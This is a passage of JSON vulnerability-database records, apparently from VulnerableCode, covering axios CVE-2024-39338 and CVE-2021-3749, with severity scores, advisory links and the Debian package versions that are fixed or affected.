00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86286","published_at":"2026-04-09T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86276","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86257","published_at":"2026-04-07T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86238","published_at":"2026-04-02T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86256","published_at":"2026-04-04T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86337","published_at":"2026-04-26T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86327","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39338"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a"},{"reference_url":"https://github.com/axios/axios/issues/6463","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/6463"},{"reference_url":"https://github.com/axios/axios/pull/6539","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6539"},{"reference_url":"https://github.com/axios/axios/pull/6543","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6543"},{"reference_url":"https://github.com/axios/axios/releases","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/"}],"url":"https://github.com/axios/axios/releases"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.7.4","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.7.4"},{"reference_url":"https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/"}],"url":"https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39338","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39338"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878","reference_id":"1078878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2304369","reference_id":"2304369","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2304369"},{"reference_url":"https://github.com/advisories/GHSA-8hc4-vh64-cxmj","reference_id":"GHSA-8hc4-vh64-cxmj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8hc4-vh64-cxmj"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6209","reference_id":"RHSA-2024:6209","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6209"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6210","reference_id":"RHSA-2024:6210","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6210"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6211","reference_id":"RHSA-2024:6211","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6211"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6667","reference_id":"RHSA-2024:6667","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6667"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8014","reference_id":"RHSA-2024:8014","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8014"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8023","reference_id":"RHSA-2024:8023","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8023"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8981","reference_id":"RHSA-2024:8981","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8981"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932087?format=json","purl":"pkg:deb/debian/node-axios@0?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932088?format=json","purl":"pkg:deb/debian/node-axios@1.7.4%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.7.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2024-39338","GHSA-8hc4-vh64-cxmj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-epu9-wdt3-kbay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11158?format=json","vulnerability_id":"VCID-n89f-3nkb-ebg3","summary":"Incorrect Comparison\naxios is vulnerable to Inefficient Regular Expression Complexity","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3749.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3749.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3749","reference_id":"","reference_type":"","scores":[{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92213","published_at":"2026-04-04T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92237","published_at":"2026-04-12T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92231","published_at":"2026-04-09T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92228","published_at":"2026-04-08T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92216","published_at":"2026-04-07T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92207","published_at":"2026-04-02T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.922","published_at":"2026-04-01T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92245","published_at":"2026-04-18T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92246","published_at":"2026-04-16T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92234","published_at":"2026-04-13T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.9237","published_at":"2026-04-29T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.92376","published_at":"2026-04-26T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.92375","published_at":"2026-04-24T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.92371","published_at":"2026-04-21T12:55:00Z"},{"value":"0.08894","scoring_system":"epss","scoring_elements":"0.92589","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3749"},{"reference_url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3749","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3749"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929"},{"reference_url":"https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31"},{"reference_url":"https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://www.npmjs.com/package/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/package/axios"},{"reference_url":"https://www.oracle.com/security-alerts/cpujul2022.html","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1999784","reference_id":"1999784","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1999784"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3749","reference_id":"CVE-2021-3749","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3749"},{"reference_url":"https://github.com/advisories/GHSA-cph5-m8f7-6c5x","reference_id":"GHSA-cph5-m8f7-6c5x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cph5-m8f7-6c5x"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3694","reference_id":"RHSA-2021:3694","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3694"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4902","reference_id":"RHSA-2021:4902","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4902"},{"reference_url":"https://access.redhat.com/errata/RHSA-2022:0056","reference_id":"RHSA-2022:0056","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2022:0056"},{"reference_url":"https://access.redhat.com/errata/RHSA-2022:1276","reference_id":"RHSA-2022:1276","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2022:1276"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932085?format=json","purl":"pkg:deb/debian/node-axios@0.21.3%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.3%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-